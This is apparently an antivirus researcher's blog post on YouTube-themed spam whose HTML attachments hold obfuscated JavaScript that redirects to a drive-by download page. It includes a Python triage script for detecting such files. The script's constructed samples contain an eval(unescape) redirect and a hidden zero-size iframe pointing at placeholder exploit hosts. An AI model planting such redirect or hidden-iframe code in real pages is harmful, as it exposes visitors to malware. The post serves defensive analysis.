YouTube Spam Mails with malicious JavaScript

During the last few days we received a lot of emails with subjects like “User <username> suggests you to become friends on YouTube”. Since no YouTube account is connected to the receiving mailboxes, the mails were suspicious and we took a closer look at them.

The mails carry an HTML file as an attachment and try to get the recipient to open it in a web browser. To slip past mail filters, the HTML file contains nothing but obfuscated (“encrypted”) JavaScript: the real payload only appears once the script decodes itself inside the browser, so a filter looking at the attachment sees no plain-text URL or script it could match.

After decoding the JavaScript it became clear that it redirects the user’s browser to a web site, which is itself just another redirector. The second redirect lands on a page that includes a hidden iframe; the iframe loads malicious code that tries to infect the user’s PC by exploiting vulnerabilities in outdated software, a classic drive-by download.
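To make the two indicators described above (self-decoding script in the attachment, hidden iframe on the landing page) concrete, here is an added triage script. It is not Avira’s code and not part of the original post: it statically peels the `unescape()` / `String.fromCharCode()` wrapper commonly used in such attachments, pulls out the redirect target, and flags iframes that are sized to nothing or hidden via CSS. The two sample pages, the `eval(unescape(...))` wrapper and all hostnames (`*.example.invalid`) are constructed for the example and are not the real files or URLs from this campaign.

```python
import re
from urllib.parse import unquote

# --- Constructed samples (not the real campaign files) ---------------------
# Stage 1: the attachment. Its only content is a script that decodes a
# percent-escaped string and eval()s it, so the redirect target never appears
# in clear text in the file a mail filter sees. Hostname is a placeholder.
INNER_JS = "document.location.href='http://redirector1.example.invalid/go.php';"
SAMPLE_ATTACHMENT = (
    "<html><body><script>eval(unescape('"
    + "".join("%%%02X" % ord(c) for c in INNER_JS)   # attacker-style %XX encoding
    + "'));</script></body></html>"
)
# Stage 2 (where the redirect chain ends): a 0x0 iframe pulling the exploit
# page. Hostname is a placeholder.
SAMPLE_STAGE2 = (
    '<html><body>Loading...<iframe src="http://exploit.example.invalid/in.php" '
    'width="0" height="0" style="visibility:hidden"></iframe></body></html>'
)

# --- Static de-obfuscation --------------------------------------------------
UNESCAPE_CALL = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)
CHARCODE_CALL = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")

def js_unescape(s):
    """Mimic JavaScript unescape(): %uXXXX and %XX, bytes taken as Latin-1."""
    s = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding="latin-1")

def peel(js, max_depth=5):
    """Replace unescape('...') / String.fromCharCode(...) calls by their
    decoded text, repeating for nested layers. The result is a flattened
    view for indicator matching, not valid JavaScript."""
    for _ in range(max_depth):
        new = UNESCAPE_CALL.sub(lambda m: js_unescape(m.group(2)), js)
        new = CHARCODE_CALL.sub(
            lambda m: "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()),
            new)
        if new == js:          # no further layer found
            break
        js = new
    return js

# --- Indicators -------------------------------------------------------------
REDIRECT = re.compile(
    r"(?:window|document|top|self|parent)?\.?location(?:\.href)?\s*=\s*['\"]([^'\"]+)['\"]"
    r"|location\.(?:replace|assign)\(\s*['\"]([^'\"]+)['\"]"
    r"|<meta[^>]+http-equiv=['\"]?refresh['\"]?[^>]+url=([^'\">\s]+)",
    re.I)
IFRAME = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR = re.compile(r"([\w-]+)\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>\"']+))")

def redirect_targets(text):
    """URLs the (decoded) page sends the browser to."""
    return [g for m in REDIRECT.finditer(text) for g in m.groups() if g]

def find_hidden_iframes(page):
    """Return src of iframes sized to nothing or hidden via CSS."""
    hits = []
    for m in IFRAME.finditer(page):
        attrs = {a.group(1).lower(): (a.group(2) or a.group(3) or a.group(4) or "")
                 for a in ATTR.finditer(m.group(1))}
        style = attrs.get("style", "").replace(" ", "").lower()
        tiny = any(attrs.get(k, "").lower().rstrip("px").strip() in ("0", "1")
                   for k in ("width", "height"))
        concealed = "display:none" in style or "visibility:hidden" in style
        if tiny or concealed:
            hits.append(attrs.get("src", ""))
    return hits

def triage(attachment):
    """Static verdict for one HTML attachment or landing page."""
    flat = peel(attachment)
    ind = {
        "eval": bool(re.search(r"\beval\s*\(", attachment)),
        "unescape": "unescape(" in attachment,
        "fromCharCode": "fromCharCode(" in attachment,
    }
    redirects = redirect_targets(flat)
    iframes = find_hidden_iframes(flat)
    suspicious = (ind["eval"] and (ind["unescape"] or ind["fromCharCode"])
                  or bool(redirects) or bool(iframes))
    return {"indicators": ind, "decoded": flat, "redirects": redirects,
            "hidden_iframes": iframes, "suspicious": suspicious}

if __name__ == "__main__":
    for name, page in (("attachment", SAMPLE_ATTACHMENT), ("stage2", SAMPLE_STAGE2)):
        r = triage(page)
        print(name, "suspicious" if r["suspicious"] else "clean",
              r["redirects"], r["hidden_iframes"])
```

The script never executes the JavaScript; it only rewrites the two wrapper calls textually, which is enough for single-layer samples like the one described and for a few nested layers. Samples that compute the decode key at run time or split the payload across several variables need a real JavaScript sandbox instead, so treat a “clean” verdict from this kind of static check as “no known wrapper found”, not as proof of harmlessness.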

As a general rule, don’t follow links in emails you didn’t expect, and never open attachments from such mails. Avira detects the malicious JavaScript as JS/Redirect.qrl and the hidden iframe page it redirects to as HTML/IFrame.cef.

Thomas Wegele
Virus Researcher